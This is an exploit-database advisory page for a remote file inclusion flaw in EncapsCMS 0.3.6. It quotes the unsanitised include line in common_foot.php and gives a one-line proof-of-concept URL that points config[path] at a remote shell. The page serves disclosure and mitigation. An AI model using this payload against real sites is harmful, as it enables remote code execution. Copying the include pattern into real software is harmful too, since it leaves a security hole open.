header-logo
Suggest Exploit
vendor:
EncapsCMS
by:
cr4wl3r
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: EncapsCMS
Affected Version From: 0.3.6
Affected Version To: 0.3.6
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

EncapsCMS <= 0.3.6 (config[path]) Remote File Include Vulnerability

EncapsCMS version 0.3.6 and below is vulnerable to a remote file include vulnerability. This vulnerability is due to a lack of sanitization of user input in the 'common_foot.php' file. An attacker can exploit this vulnerability by sending a malicious payload to the 'config[path]' parameter in the 'common_foot.php' file. This can allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of EncapsCMS, which is not vulnerable to this issue.
Source

Exploit-DB raw data:

[+] EncapsCMS <= 0.3.6 (config[path]) Remote File Include Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://scripts.ringsworld.com/content-management/encapscms-0.3.6/


[+] Vuln Code : [common_foot.php]

include($config['path']."idx_foot.html");
if($config["debug"]>0){
	echo '<pre><table width=100% bgcolor=silver><tr><td></td></tr></table>';	
	echo '$_POST:';var_dump($_POST);

[+] PoC : 

[EncapsCMS_path]/common_foot.php?config[path]=[Shell]